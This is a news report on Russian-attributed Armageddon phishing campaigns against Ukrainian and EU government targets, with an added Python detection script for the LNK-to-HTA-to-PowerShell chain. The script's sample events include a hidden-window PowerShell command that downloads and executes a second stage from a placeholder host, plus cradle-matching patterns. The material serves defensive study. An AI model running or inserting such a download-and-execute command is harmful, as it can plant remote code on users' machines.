New phishing campaigns attributed to the Russian threat actor known as Armageddon (also tracked as Gamaredon) have been disclosed by Ukraine’s Computer Emergency Response Team (CERT-UA). The malicious emails use lures themed on the war in Ukraine and infect targeted machines with espionage-focused malware. CERT-UA describes two distinct campaigns, one aimed at Ukrainian institutions and the other at government agencies of European Union member states.
Armageddon is a Russian state-sponsored threat actor that has targeted Ukraine since at least 2014 and is believed to operate under the FSB (Russia’s Federal Security Service). According to a detailed technical report published by Ukraine’s security service in November 2021, Armageddon has carried out at least 5,000 cyber-attacks against 1,500 critical Ukrainian organizations.
Ukrainian investigators had already identified members of the Armageddon group, documented its toolkit, and linked its custom malware development to Russian hacker forums. As a result, even under wartime conditions in which cyber-response teams have limited resources and time, some attributions can be made with higher confidence because of that earlier, comprehensive attribution work.
Armageddon’s Ukraine-focused campaign sends emails with the subject “Information on war criminals of the Russian Federation” to various government institutions in the country. The emails, sent from “Vadim_melnik88@i[.]ua”, carry an HTML attachment that, according to CERT-UA, is poorly detected by security software.
When the attachment is opened, it drops a RAR archive onto the machine. The archive holds a shortcut file (.lnk) that purports to contain identity details of people accused of war crimes in Ukraine. Opening the LNK instead fetches an HTA file containing VBScript, which runs a PowerShell script that retrieves the final payload.
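The chain above (LNK launches an HTA via mshta.exe, whose VBScript in turn starts PowerShell to fetch the next stage) leaves a recognizable parent/child trail in endpoint process-creation telemetry. The following is an added example, not code from the article or from CERT-UA, that triages Sysmon Event ID 1-shaped events for exactly that trail: mshta.exe started with a remote URL, and a child powershell.exe whose command line carries a download or decode cradle. The events and the URLs in them are constructed for the example and are hypothetical; field names are simplified from Sysmon's.

```python
import re

# Constructed sample process-creation events (loosely Sysmon Event ID 1 shaped).
# These are NOT real telemetry; pids, paths and URLs are hypothetical.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 800, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # Victim opens the .lnk from the extracted archive; its target runs mshta.exe
    # with a remote HTA (hypothetical URL).
    {"pid": 1320, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://example.invalid/war_criminals.hta"},
    # VBScript inside the HTA spawns PowerShell to fetch the next stage.
    {"pid": 1404, "ppid": 1320,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -ep bypass -c "
            "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\""},
    # Benign: an administrator runs a local HTA tool (no remote URL).
    {"pid": 2000, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Tools\inventory.hta"'},
    # Benign: interactive PowerShell launched from explorer.
    {"pid": 2100, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe"},
]

URL_RE = re.compile(r"https?://", re.I)
# Common PowerShell download / decode cradle tokens. "-ep bypass" alone is
# deliberately not matched: the -e(nc)? branch requires a word boundary.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|-e(nc|ncodedcommand)?\b",
    re.I,
)


def basename(path):
    """Last path component, lower-cased, for image comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def mshta_with_remote_url(event):
    """mshta.exe given an http(s) URL: the HTA stage of the chain."""
    return basename(event["image"]) == "mshta.exe" and bool(URL_RE.search(event["cmd"]))


def powershell_download_cradle(event):
    """powershell.exe whose command line contains a download/decode cradle."""
    return basename(event["image"]) == "powershell.exe" and bool(CRADLE_RE.search(event["cmd"]))


def find_chains(events):
    """Return (mshta_pid, powershell_pid) pairs where a remote-HTA mshta.exe
    is the direct parent of a PowerShell download cradle."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not powershell_download_cradle(e):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is not None and mshta_with_remote_url(parent):
            hits.append((parent["pid"], e["pid"]))
    return hits


def triage(events):
    """Map pid -> list of reasons. Single-stage hits are lower confidence;
    a parent/child chain is appended as a high-confidence reason."""
    reasons = {}
    for e in events:
        r = []
        if mshta_with_remote_url(e):
            r.append("mshta.exe launched with a remote URL (likely HTA stage)")
        if powershell_download_cradle(e):
            r.append("powershell.exe download/decode cradle")
        if r:
            reasons[e["pid"]] = r
    for mshta_pid, ps_pid in find_chains(events):
        reasons[ps_pid].append(
            f"parent mshta.exe pid {mshta_pid} fetched a remote HTA: "
            "full LNK -> HTA -> PowerShell chain")
    return reasons


if __name__ == "__main__":
    for pid, why in triage(SAMPLE_EVENTS).items():
        print(pid, "|", "; ".join(why))
```

In practice the LNK target is the first place to look: a shortcut that points at mshta.exe, wscript.exe or powershell.exe rather than a document is itself a strong signal, and the detection should be tuned against an environment's legitimate HTA usage before alerting on mshta.exe alone.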
In its campaign targeting several EU governments, Armageddon uses RAR archive attachments named “Assistance” and “Necessary_military_assistance.” The shortcut files (.lnk) inside the archives pose as lists of items needed for military and humanitarian aid to Ukraine, and opening one triggers the same infection chain described above. The sender address, “info@military-ukraine[.]site”, is crafted to look legitimate, and the message is signed in the name of a Major General presented as Ukraine’s Deputy Commander for Armaments.
CERT-UA has confirmed at least one instance of these emails reaching a Latvian government mailbox, so other European countries are likely targets of the same campaign. The report is consistent with other recent findings on Russia-linked activity against EU entities, including last week’s Google TAG report on phishing campaigns, GPS interference in the Baltic region, wiper malware deployed against the KA-SAT satellite service, and phishing attacks against organizations assisting with the refugee crisis.